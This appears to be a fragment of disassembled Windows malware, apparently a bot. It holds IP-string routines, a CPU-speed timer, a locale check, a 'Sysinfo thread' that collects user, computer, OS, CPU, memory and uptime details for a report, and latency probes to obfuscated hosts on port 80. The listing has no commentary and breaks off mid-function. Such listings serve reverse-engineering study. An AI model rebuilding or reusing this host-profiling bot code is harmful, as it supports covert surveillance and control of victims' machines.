cmp eax, 72h
jnz short loc_407E4A
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz short loc_407E4A
push 0Ah
push [ebp+arg_C]
push 0FFh
push 0
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
mov eax, [ebp+arg_10]
jmp locret_407F3B
; ---------------------------------------------------------------------------
loc_407E4A: ; CODE XREF: sub_407E0C+D�j
; sub_407E0C+18�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 73h
jz short loc_407E64
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 69h
jnz loc_407EF9
loc_407E64: ; CODE XREF: sub_407E0C+47�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz loc_407EF9
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407EB3
cmp [ebp+arg_10], 0
jz short loc_407EB3
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
movzx eax, al
inc eax
mov [ebp+var_4], al
push 0Ah
push [ebp+arg_C]
movzx eax, [ebp+var_4]
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
movzx eax, [ebp+var_4]
neg eax
sbb eax, eax
inc eax
jmp locret_407F3B
; ---------------------------------------------------------------------------
loc_407EB3: ; CODE XREF: sub_407E0C+6F�j
; sub_407E0C+75�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407ECC
push [ebp+arg_0]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407EF5
; ---------------------------------------------------------------------------
loc_407ECC: ; CODE XREF: sub_407E0C+AF�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
cmp eax, 69h
jnz short loc_407EE8
push offset dword_418F50
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407EF5
; ---------------------------------------------------------------------------
loc_407EE8: ; CODE XREF: sub_407E0C+C9�j
push [ebp+arg_8]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_407EF5: ; CODE XREF: sub_407E0C+BE�j
; sub_407E0C+DA�j
xor eax, eax
jmp short locret_407F3B
; ---------------------------------------------------------------------------
loc_407EF9: ; CODE XREF: sub_407E0C+52�j
; sub_407E0C+61�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407F12
push [ebp+arg_4]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407F38
; ---------------------------------------------------------------------------
loc_407F12: ; CODE XREF: sub_407E0C+F5�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_407F2B
push [ebp+arg_0]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_407F38
; ---------------------------------------------------------------------------
loc_407F2B: ; CODE XREF: sub_407E0C+10E�j
push [ebp+arg_8]
push [ebp+arg_C]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_407F38: ; CODE XREF: sub_407E0C+104�j
; sub_407E0C+11D�j
mov eax, [ebp+arg_10]
locret_407F3B: ; CODE XREF: sub_407E0C+39�j
; sub_407E0C+A2�j ...
leave
retn
sub_407E0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F3D proc near ; CODE XREF: .text:0041362E�p
; .text:00413876�p
var_44 = byte ptr -44h
var_40 = byte ptr -40h
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 44h
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_0]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407F69
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407F69: ; CODE XREF: sub_407F3D+23�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_40]
push eax
push [ebp+arg_4]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407F8F
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407F8F: ; CODE XREF: sub_407F3D+49�j
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_1C]
push eax
push offset dword_41EF48
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_407FB7
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407FB7: ; CODE XREF: sub_407F3D+71�j
movsx eax, [ebp+var_14]
test eax, eax
jnz short loc_407FC6
xor eax, eax
jmp locret_408068
; ---------------------------------------------------------------------------
loc_407FC6: ; CODE XREF: sub_407F3D+80�j
mov [ebp+var_18], 1
push [ebp+var_18]
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_44]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
push [ebp+var_18]
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_407E0C
add esp, 14h
mov [ebp+var_18], eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_20]
push eax
push offset aS_S_S_S ; "%s.%s.%s.%s"
push [ebp+arg_8]
call sub_416B5E ; sprintf
add esp, 18h
push 1
pop eax
locret_408068: ; CODE XREF: sub_407F3D+27�j
; sub_407F3D+4D�j ...
leave
retn
sub_407F3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40806A proc near ; CODE XREF: .text:004135C6�p
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_408096
xor eax, eax
jmp locret_40813A
; ---------------------------------------------------------------------------
loc_408096: ; CODE XREF: sub_40806A+23�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push offset dword_41EF48
call sub_407D42
add esp, 14h
test eax, eax
jnz short loc_4080BB
xor eax, eax
jmp short locret_40813A
; ---------------------------------------------------------------------------
loc_4080BB: ; CODE XREF: sub_40806A+4B�j
movsx eax, [ebp+var_18]
test eax, eax
jnz short loc_4080D2
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_4080D2: ; CODE XREF: sub_40806A+57�j
movsx eax, [ebp+var_1C]
test eax, eax
jnz short loc_4080E9
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_1C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_4080E9: ; CODE XREF: sub_40806A+6E�j
movsx eax, [ebp+var_20]
test eax, eax
jnz short loc_408100
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_20]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_408100: ; CODE XREF: sub_40806A+85�j
movsx eax, [ebp+var_4]
test eax, eax
jnz short loc_408117
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_408117: ; CODE XREF: sub_40806A+9C�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push offset aS_S_S_S ; "%s.%s.%s.%s"
push [ebp+arg_0]
call sub_416B5E ; sprintf
add esp, 18h
push 1
pop eax
locret_40813A: ; CODE XREF: sub_40806A+27�j
; sub_40806A+4F�j
leave
retn
sub_40806A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40813C proc near ; CODE XREF: sub_407928+54�p
; sub_407928+9D�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jz short loc_408150
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_0]
mov [eax], ecx
loc_408150: ; CODE XREF: sub_40813C+A�j
mov eax, [ebp+arg_8]
mov eax, [eax]
mov [ebp+var_8], eax
jmp short loc_408161
; ---------------------------------------------------------------------------
loc_40815A: ; CODE XREF: sub_40813C:loc_4081A0�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_408161: ; CODE XREF: sub_40813C+1C�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4081A2
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_408171: ; CODE XREF: sub_40813C+56�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_408194
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_8]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jz short loc_408194
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_408171
; ---------------------------------------------------------------------------
loc_408194: ; CODE XREF: sub_40813C+3D�j
; sub_40813C+4D�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4081A0
jmp short loc_4081A2
; ---------------------------------------------------------------------------
loc_4081A0: ; CODE XREF: sub_40813C+60�j
jmp short loc_40815A
; ---------------------------------------------------------------------------
loc_4081A2: ; CODE XREF: sub_40813C+2D�j
; sub_40813C+62�j
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_4081AE: ; CODE XREF: sub_40813C:loc_4081F5�j
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4081F7
mov eax, [ebp+var_C]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
movsx ecx, byte ptr [ecx]
cmp eax, ecx
jnz short loc_4081D7
mov eax, [ebp+var_C]
and byte ptr [eax], 0
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_4081F7
; ---------------------------------------------------------------------------
loc_4081D7: ; CODE XREF: sub_40813C+8A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4081F5
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
loc_4081F5: ; CODE XREF: sub_40813C+AA�j
jmp short loc_4081AE
; ---------------------------------------------------------------------------
loc_4081F7: ; CODE XREF: sub_40813C+7A�j
; sub_40813C+99�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
mov [eax], ecx
mov eax, [ebp+var_8]
sub eax, [ebp+var_C]
neg eax
sbb eax, eax
and eax, [ebp+var_8]
leave
retn
sub_40813C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40820E proc near ; CODE XREF: sub_40821B:loc_408221�p
; sub_40821B+1C�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
rdtsc
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40820E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40821B proc near ; CODE XREF: .text:00408751�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
loc_408221: ; CODE XREF: sub_40821B+4A�j
; sub_40821B+55�j
call sub_40820E
mov [ebp+var_20], eax
mov [ebp+var_1C], edx
push 3E8h
call ds:dword_41709C ; Sleep
call sub_40820E
sub eax, [ebp+var_20]
sbb edx, [ebp+var_1C]
push 0
push 186A0h
push edx
push eax
call sub_416C90
push 0
push 0Ah
push edx
push eax
call sub_416C90
mov [ebp+var_8], eax
mov [ebp+var_4], edx
cmp [ebp+var_4], 0
ja short loc_408221
jb short loc_408272
cmp [ebp+var_8], 0F4240h
ja short loc_408221
loc_408272: ; CODE XREF: sub_40821B+4C�j
push 0
push 64h
push [ebp+var_4]
push [ebp+var_8]
call sub_416C10
mov [ebp+var_18], eax
mov [ebp+var_14], edx
mov [ebp+var_10], 64h
and [ebp+var_C], 0
cmp [ebp+var_14], 0
ja short loc_4082AB
jb short loc_4082A0
cmp [ebp+var_18], 50h
jnb short loc_4082AB
loc_4082A0: ; CODE XREF: sub_40821B+7D�j
mov [ebp+var_10], 4Bh
and [ebp+var_C], 0
loc_4082AB: ; CODE XREF: sub_40821B+7B�j
; sub_40821B+83�j
cmp [ebp+var_14], 0
ja short loc_4082C4
jb short loc_4082B9
cmp [ebp+var_18], 47h
jnb short loc_4082C4
loc_4082B9: ; CODE XREF: sub_40821B+96�j
mov [ebp+var_10], 42h
and [ebp+var_C], 0
loc_4082C4: ; CODE XREF: sub_40821B+94�j
; sub_40821B+9C�j
cmp [ebp+var_14], 0
ja short loc_4082DD
jb short loc_4082D2
cmp [ebp+var_18], 37h
jnb short loc_4082DD
loc_4082D2: ; CODE XREF: sub_40821B+AF�j
mov [ebp+var_10], 32h
and [ebp+var_C], 0
loc_4082DD: ; CODE XREF: sub_40821B+AD�j
; sub_40821B+B5�j
cmp [ebp+var_14], 0
ja short loc_4082F6
jb short loc_4082EB
cmp [ebp+var_18], 26h
jnb short loc_4082F6
loc_4082EB: ; CODE XREF: sub_40821B+C8�j
mov [ebp+var_10], 21h
and [ebp+var_C], 0
loc_4082F6: ; CODE XREF: sub_40821B+C6�j
; sub_40821B+CE�j
cmp [ebp+var_14], 0
ja short loc_40830F
jb short loc_408304
cmp [ebp+var_18], 1Eh
jnb short loc_40830F
loc_408304: ; CODE XREF: sub_40821B+E1�j
mov [ebp+var_10], 19h
and [ebp+var_C], 0
loc_40830F: ; CODE XREF: sub_40821B+DF�j
; sub_40821B+E7�j
cmp [ebp+var_14], 0
ja short loc_408325
jb short loc_40831D
cmp [ebp+var_18], 0Ah
jnb short loc_408325
loc_40831D: ; CODE XREF: sub_40821B+FA�j
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408325: ; CODE XREF: sub_40821B+F8�j
; sub_40821B+100�j
mov eax, [ebp+var_8]
sub eax, [ebp+var_18]
mov ecx, [ebp+var_4]
sbb ecx, [ebp+var_14]
add eax, [ebp+var_10]
adc ecx, [ebp+var_C]
mov [ebp+var_8], eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_8]
leave
retn
sub_40821B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408342 proc near ; CODE XREF: sub_40D043+156�p
; sub_40D871+30C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1Fh
push [ebp+arg_0]
push 7
push 400h
call ds:dword_417034 ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
and byte ptr [eax+3], 0
cmp [ebp+var_4], 0
jz short loc_408381
push offset dword_419100
push [ebp+arg_0]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_4083A8
loc_408381: ; CODE XREF: sub_408342+2A�j
push 1Fh
push [ebp+arg_0]
push 7
push 800h
call ds:dword_417034 ; GetLocaleInfoA
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
and byte ptr [eax+3], 0
mov eax, [ebp+var_4]
jmp short locret_4083AB
; ---------------------------------------------------------------------------
loc_4083A8: ; CODE XREF: sub_408342+3D�j
push 1
pop eax
locret_4083AB: ; CODE XREF: sub_408342+64�j
leave
retn
sub_408342 endp
; ---------------------------------------------------------------------------
loc_4083AD: ; DATA XREF: sub_4087C4+35�o
push ebp
mov ebp, esp
sub esp, 750h
push ebx
push esi
push edi
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-6CCh]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
lea eax, [ebp-734h]
push eax
call ds:dword_4170C4 ; GlobalMemoryStatus
mov eax, [ebp-72Ch]
add eax, 100000h
shr eax, 14h
mov [ebp-6F0h], eax
mov eax, [ebp-728h]
add eax, 100000h
shr eax, 14h
mov [ebp-738h], eax
call sub_4092A4
mov [ebp-714h], eax
mov eax, [ebp-714h]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp-6E8h], eax
mov eax, [ebp-714h]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp-524h], eax
mov eax, [ebp-714h]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp-6E4h], eax
mov dword ptr [ebp-8], 15h
mov dword ptr [ebp-6D0h], 10h
lea eax, [ebp-8]
push eax
lea eax, [ebp-708h]
push eax
call ds:dword_417018 ; GetUserNameA
lea eax, [ebp-6D0h]
push eax
lea eax, [ebp-6E0h]
push eax
call ds:dword_417078 ; GetComputerNameA
mov dword ptr [ebp-520h], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp-51Ch]
rep stosd
lea eax, [ebp-520h]
push eax
call ds:dword_417030 ; GetVersionExA
mov dword ptr [ebp-48Ch], offset a? ; "?"
mov dword ptr [ebp-710h], offset aNoSp ; "no SP"
cmp dword ptr [ebp-51Ch], 4
jnz short loc_408522
cmp dword ptr [ebp-518h], 0
jnz short loc_408522
cmp dword ptr [ebp-510h], 1
jnz short loc_40850A
mov dword ptr [ebp-48Ch], offset a95 ; "95"
loc_40850A: ; CODE XREF: .text:004084FE�j
cmp dword ptr [ebp-510h], 2
jnz short loc_40851D
mov dword ptr [ebp-48Ch], offset aNt ; "NT"
loc_40851D: ; CODE XREF: .text:00408511�j
jmp loc_4085B6
; ---------------------------------------------------------------------------
loc_408522: ; CODE XREF: .text:004084EC�j
; .text:004084F5�j
cmp dword ptr [ebp-51Ch], 4
jnz short loc_408540
cmp dword ptr [ebp-518h], 0Ah
jnz short loc_408540
mov dword ptr [ebp-48Ch], offset a98 ; "98"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_408540: ; CODE XREF: .text:00408529�j
; .text:00408532�j
cmp dword ptr [ebp-51Ch], 4
jnz short loc_40855E
cmp dword ptr [ebp-518h], 5Ah
jnz short loc_40855E
mov dword ptr [ebp-48Ch], offset aMe ; "ME"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40855E: ; CODE XREF: .text:00408547�j
; .text:00408550�j
cmp dword ptr [ebp-51Ch], 5
jnz short loc_40857C
cmp dword ptr [ebp-518h], 0
jnz short loc_40857C
mov dword ptr [ebp-48Ch], offset a2000 ; "2000"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40857C: ; CODE XREF: .text:00408565�j
; .text:0040856E�j
cmp dword ptr [ebp-51Ch], 5
jnz short loc_40859A
cmp dword ptr [ebp-518h], 1
jnz short loc_40859A
mov dword ptr [ebp-48Ch], offset aXp ; "XP"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40859A: ; CODE XREF: .text:00408583�j
; .text:0040858C�j
cmp dword ptr [ebp-51Ch], 5
jnz short loc_4085B6
cmp dword ptr [ebp-518h], 2
jnz short loc_4085B6
mov dword ptr [ebp-48Ch], offset a2003 ; "2003"
loc_4085B6: ; CODE XREF: .text:loc_40851D�j
; .text:0040853E�j ...
cmp dword ptr [ebp-510h], 2
jnz short loc_4085D6
movsx eax, byte ptr [ebp-50Ch]
test eax, eax
jz short loc_4085D6
lea eax, [ebp-50Ch]
mov [ebp-710h], eax
loc_4085D6: ; CODE XREF: .text:004085BD�j
; .text:004085C8�j
call sub_40435B
test eax, eax
jz short loc_4085EB
mov dword ptr [ebp-744h], offset aYes ; "Yes"
jmp short loc_4085F5
; ---------------------------------------------------------------------------
loc_4085EB: ; CODE XREF: .text:004085DD�j
mov dword ptr [ebp-744h], offset aNo ; "No"
loc_4085F5: ; CODE XREF: .text:004085E9�j
mov eax, [ebp-744h]
mov [ebp-4], eax
and byte ptr [ebp-47Ch], 0
and byte ptr [ebp-409h], 0
xor eax, eax
cpuid
mov [ebp-488h], ebx
mov [ebp-484h], edx
mov [ebp-480h], ecx
lea eax, [ebp-488h]
mov [ebp-6ECh], eax
and dword ptr [ebp-70Ch], 0
lea eax, [ebp-70Ch]
push eax
push 20019h
push 0
push offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_4086B3
and dword ptr [ebp-73Ch], 0
mov dword ptr [ebp-740h], 80h
lea eax, [ebp-740h]
push eax
lea eax, [ebp-488h]
push eax
lea eax, [ebp-73Ch]
push eax
push 0
push offset aProcessornames ; "ProcessorNameString"
push dword ptr [ebp-70Ch]
call ds:dword_41700C ; RegQueryValueExA
test eax, eax
jnz short loc_4086A7
push 1
push 1
lea eax, [ebp-488h]
push eax
call sub_407C2C
add esp, 0Ch
loc_4086A7: ; CODE XREF: .text:00408692�j
push dword ptr [ebp-70Ch]
call ds:dword_417028 ; RegCloseKey
loc_4086B3: ; CODE XREF: .text:00408655�j
cmp dword ptr [ebp-6E4h], 1
jnz short loc_4086C8
mov dword ptr [ebp-748h], offset byte_41DE30
jmp short loc_4086D2
; ---------------------------------------------------------------------------
loc_4086C8: ; CODE XREF: .text:004086BA�j
mov dword ptr [ebp-748h], offset dword_4191F4
loc_4086D2: ; CODE XREF: .text:004086C6�j
cmp dword ptr [ebp-524h], 1
jnz short loc_4086E7
mov dword ptr [ebp-74Ch], offset byte_41DE30
jmp short loc_4086F1
; ---------------------------------------------------------------------------
loc_4086E7: ; CODE XREF: .text:004086D9�j
mov dword ptr [ebp-74Ch], offset dword_4191F4
loc_4086F1: ; CODE XREF: .text:004086E5�j
cmp dword ptr [ebp-6E8h], 1
jnz short loc_408706
mov dword ptr [ebp-750h], offset byte_41DE30
jmp short loc_408710
; ---------------------------------------------------------------------------
loc_408706: ; CODE XREF: .text:004086F8�j
mov dword ptr [ebp-750h], offset dword_4191F4
loc_408710: ; CODE XREF: .text:00408704�j
lea eax, [ebp-708h]
push eax
lea eax, [ebp-6E0h]
push eax
push dword ptr [ebp-748h]
push dword ptr [ebp-6E4h]
push dword ptr [ebp-74Ch]
push dword ptr [ebp-524h]
push dword ptr [ebp-750h]
push dword ptr [ebp-6E8h]
push dword ptr [ebp-4]
push dword ptr [ebp-6F0h]
push dword ptr [ebp-738h]
call sub_40821B
push eax
push dword ptr [ebp-6ECh]
push dword ptr [ebp-514h]
push dword ptr [ebp-518h]
push dword ptr [ebp-51Ch]
push dword ptr [ebp-710h]
push dword ptr [ebp-48Ch]
push offset dword_419104
push 400h
lea eax, [ebp-408h]
push eax
call sub_416BAE ; _snprintf
add esp, 54h
lea eax, [ebp-408h]
push eax
push offset aS ; "%s"
lea eax, [ebp-6C8h]
push eax
call sub_40D53F
add esp, 0Ch
push dword ptr [ebp-6CCh]
call sub_409763
pop ecx
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087C4 proc near ; CODE XREF: sub_40A9CF+1B9C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4087DE
jmp short locret_408806
; ---------------------------------------------------------------------------
loc_4087DE: ; CODE XREF: sub_4087C4+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aSysinfoThread ; "Sysinfo thread"
push 0
push [ebp+var_4]
push offset loc_4083AD
call sub_4095A4
add esp, 10h
locret_408806: ; CODE XREF: sub_4087C4+18�j
leave
retn
sub_4087C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408808 proc near ; CODE XREF: sub_408887+B�p
; sub_408887+19�p ...
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push [ebp+arg_0]
lea eax, [ebp+var_28]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_28]
push eax
call sub_4105FB
pop ecx
call sub_416B64 ; clock
mov [ebp+var_4], eax
push 7D0h
push 0
push offset a80 ; "80"
lea eax, [ebp+var_28]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_4053B1
pop ecx
cmp [ebp+var_8], 0
jnz short loc_40885F
mov eax, 3E8h
jmp short locret_408885
; ---------------------------------------------------------------------------
loc_40885F: ; CODE XREF: sub_408808+4E�j
call sub_416B64 ; clock
sub eax, [ebp+var_4]
cmp eax, 3E8h
jnb short loc_40887B
call sub_416B64 ; clock
sub eax, [ebp+var_4]
mov [ebp+var_2C], eax
jmp short loc_408882
; ---------------------------------------------------------------------------
loc_40887B: ; CODE XREF: sub_408808+64�j
mov [ebp+var_2C], 3E8h
loc_408882: ; CODE XREF: sub_408808+71�j
mov eax, [ebp+var_2C]
locret_408885: ; CODE XREF: sub_408808+55�j
leave
retn
sub_408808 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408887 proc near ; CODE XREF: .text:00408CF2�p
; sub_40CA29+1E9�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push offset dword_418F60
call sub_408808
pop ecx
mov [ebp+var_4], eax
push offset dword_418F6C
call sub_408808
pop ecx
mov [ebp+var_8], eax
push offset dword_418F84
call sub_408808
pop ecx
mov [ebp+var_C], eax
push offset aJzFl ; "†‡Âݳ”«Ê"
call sub_408808
pop ecx
mov [ebp+var_10], eax
push offset dword_418FA0
call sub_408808
pop ecx
mov [ebp+var_14], eax
push offset dword_418FB0
call sub_408808
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
add eax, [ebp+var_C]
add eax, [ebp+var_10]
add eax, [ebp+var_14]
add eax, [ebp+var_18]
xor edx, edx
push 6
pop ecx
div ecx
leave
retn
sub_408887 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088FC proc near ; CODE XREF: .text:loc_408D33�p
var_438 = qword ptr -438h
var_430 = dword ptr -430h
var_42C = qword ptr -42Ch
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = byte ptr -308h
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 438h
and [ebp+var_8], 0
jmp short loc_408912
; ---------------------------------------------------------------------------
loc_40890B: ; CODE XREF: sub_4088FC+23�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_408912: ; CODE XREF: sub_4088FC+D�j
mov eax, [ebp+var_8]
cmp off_418FC4[eax*4], 0
jz short loc_408921
jmp short loc_40890B
; ---------------------------------------------------------------------------
loc_408921: ; CODE XREF: sub_4088FC+21�j
mov eax, [ebp+var_8]
shr eax, 1
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_408936
; ---------------------------------------------------------------------------
loc_40892F: ; CODE XREF: sub_4088FC+D6�j
mov eax, [ebp+var_4]
